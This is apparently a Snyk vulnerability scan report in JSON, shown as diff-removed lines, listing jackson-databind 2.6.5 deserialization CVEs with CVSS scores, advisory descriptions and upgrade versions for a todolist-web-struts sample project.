"2020-06-15T15:45:37Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.565244Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.9.2)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.9.2", - "2.8.11.4", - "2.7.9.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2", - "title": "GitHub Comparison" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2387", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2389", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2395", - "title": "GitHub Issue" - }, - { - "url": "https://snyk.io/blog/jackson-deserialization-vulnerability/", - "title": "Snyk Blog" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": 
"2024-03-11T09:47:46.065762Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:48:35.581531Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:40.009523Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:46.065762Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:35.581531Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. `SubTypeValidator.java` mishandles default typing when `ehcache` is used, leading to remote code execution.\n\n\n **NOTE:** This vulnerability has also been identified as: [CVE-2019-14379](https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.2, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2387)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2389)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2395)\n- [Snyk Blog](https://snyk.io/blog/jackson-deserialization-vulnerability/)\n", - "epssDetails": { - "percentile": "0.45827", - "probability": "0.00116", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-14439" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-6fpp-rgj9-8rwc", - "GHSA-gwp4-hfv6-p7hw" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2023-11-14T13:41:26.478840Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2019-07-29T12:40:42Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": 
"com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-07-29T12:40:42Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:35.581531Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-608664", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Tatu Saloranta" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.6)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.4", - "2.9.10.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.9.4,2.9.10.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java", - "className": "SubTypeValidator", - "functionName": "validateSubType" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2814", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - }, - { - "url": "https://github.com/Kamimuka/cve-2020-24616-poc", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:13.383929Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:47.311633Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:04:03.282990Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:13.383929Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:47.311633Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `br.com.anteros.dbcp.AnterosDBCPDataSource` (aka Anteros-DBCP).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). 
It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.6 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2814)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Kamimuka/cve-2020-24616-poc)\n", - "epssDetails": { - "percentile": "0.85138", - "probability": "0.01172", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-24616" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-08-26T11:28:06.617646Z", - "functions_new": [ - { - "version": [ - "[2.9.4,2.9.10.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.jsontype.impl.SubTypeValidator", - "functionName": "validateSubType" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-08-26T11:26:14Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-08-26T14:27:29Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:50:47.311633Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": 
[], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72445", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.6)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.4", - "2.8.11.2", - "2.9.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a1", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2052", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:48:41.204259Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:36.643590Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 
8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:45.496040Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:41.204259Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:36.643590Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack, if the user is handling untrusted content or using the `Default Typing` feature. an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-12022`) is not identical to `CVE-2018-12018`,`CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14723` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2052)\n", - "epssDetails": { - "percentile": "0.81303", - "probability": "0.00770", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-12022" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-cjjf-94ff-43w7", - "GHSA-wrr7-33fx-rcvj" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:11:34.234921Z", - "functions_new": [ - { - "version": [ - "[,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-05-29T17:00:04Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-10-11T17:00:03Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:36.643590Z", - "socialTrendAlert": false, - 
"packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72446", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.5)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.4", - "2.8.11.2", - "2.9.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.7.9.4)", - "[2.8.0, 2.8.11.2)", - "[2.9.0, 2.9.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb737", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2032", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 5.6, - "modificationTime": "2024-03-11T09:47:14.962980Z" - }, - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - 
"modificationTime": "2024-03-11T09:47:26.624837Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:53.818908Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.6, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:47:14.962980Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:26.624837Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It may allow content exfiltration (remote access by sending contents over ftp) when untrusted content is deserialized with default typing enabled. This vulnerability is due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-11307`) is not identical to `CVE-2018-12018`,`CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722` and `CVE-2018-14723`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb737)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2032)\n", - "epssDetails": { - "percentile": "0.85803", - "probability": "0.01278", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-11307" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-qr7j-h6gg-jmgc" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:14:00.916831Z", - "functions_new": [ - { - "version": [ - "[,2.7.9.4)", - "[2.8.0, 2.8.11.2)", - "[2.9.0, 2.9.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-05-10T17:10:58Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": 
"jackson-databind" - }, - "publicationTime": "2018-10-11T17:10:50Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:47:26.624837Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72447", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.6)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.4", - "2.8.11.2", - "2.9.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - 